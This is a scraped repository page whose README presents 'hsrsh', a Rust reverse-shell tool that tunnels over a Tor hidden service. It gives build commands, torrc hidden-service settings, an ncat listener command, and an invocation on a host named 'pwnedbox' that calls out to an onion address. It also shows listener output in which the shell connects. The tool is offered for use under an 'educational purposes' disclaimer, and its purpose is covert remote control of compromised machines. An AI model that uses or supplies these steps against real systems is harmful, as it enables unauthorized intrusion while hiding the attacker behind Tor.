Reverse shell over a Tor hidden service
You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
dustyfresh 3724c2d6e2
for the homies
3 years ago
src for the homies 3 years ago
.gitignore for the homies 3 years ago
Cargo.lock for the homies 3 years ago
Cargo.toml for the homies 3 years ago
LICENSE.txt for the homies 3 years ago for the homies 3 years ago


Hidden Service Reverse Shell, aka HSRSH

This was a quickly written tool for demonstrating a reverse shell over a hidden service all in one binary and an excuse to play with Rust. Solely for educational purposes.


$ git clone

$ cd hsrsh

$ cargo build --release

# Release binary is ./target/release/hsrsh
  1. Configure your hidden service server you will be accepting the shell connection on. Make sure netcat is installed, and add this to your torrc, and then start tor
  HiddenServiceDir /var/lib/tor/hidden_service/
  HiddenServicePort 1337

Once Tor is bootstrapped you can get the onion address from the hidden service directory

$ cat /var/lib/tor/hidden_service/hostname
  1. Start listener on the hidden service using ncat. MAKE SURE TO ONLY ALLOW LOCALHOST CONNECTIONS
  user@localhost:~$ ncat --allow -nvlp 1337
  Ncat: Listening on
  1. Execute reverse shell binary, it will create a local tor instance and connect to your listener. This takes about 15 seconds.

    user@pwnedbox:~$ ./hsrsh
    	./hsrsh changeme.onion:1337
    user@pwnedbox:~$ ./hsrsh changeme.onion:1337
  2. If everything is setup properly your shell should connect after about 20 seconds or so assuming the tor and internet connection is stable.

  user@localhost:~$ ncat --allow -nvlp 1337
  Ncat: Version 7.60 ( )
  Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
  Ncat: Listening on :::1337
  Ncat: Listening on
  Ncat: Connection from
  Ncat: Connection from
  user@pwnedbox:~$ uptime
   13:37:02 up 16 days, 46 min,  1 user,  load average: 0.82, 0.93, 1.43

To do:

  • support tls
  • windows support
  • Better / more Rust-like error handling

Things that I read that helped me out a lot with this:


This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License v3.0 for more details at

Usage of hsrsh for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.